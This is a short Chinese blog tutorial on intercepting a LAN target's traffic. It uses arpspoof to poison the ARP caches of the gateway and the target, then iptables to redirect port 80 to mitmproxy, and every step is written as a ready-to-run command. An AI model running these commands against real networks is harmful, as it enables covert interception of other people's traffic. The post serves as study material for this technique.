mimtproxy和arpspoof实现局域网MITM
本地环境
环境:kali系统
目标机器:192.168.0.101
局域网网关:192.168.0.1
当前网络网卡端口:wlan0
arp欺骗流程
命令行开启本地数据转发:
运行下面代码
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof局域网arp欺骗神器:
欺骗网关,伪造我是目标机器:
运行下面代码
arpspoof -i wlan0 -t 192.168.0.1 192.168.0.101
欺骗目标机器:
运行下面代码
arpspoof -i wlan0 -t 192.168.0.101 192.168.0.1
然后目标机器的所有数据,都会走我们本地机器, 现在开始嗅探目标的数据请求信息,我们使用mitmproxy;
mitmproxy嗅探数据
在本机kali机器执行iptables的数据转发,把所有经过80端口的数据,转发到8080:
运行下面代码
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
使用mitmproxy启动代理服务, mimtproxy的默认代理端口为8080
运行下面代码
mitmproxy -T
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
本文作者:方方和圆圆
本文链接:https://www.cnblogs.com/diligenceday/p/8111701.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步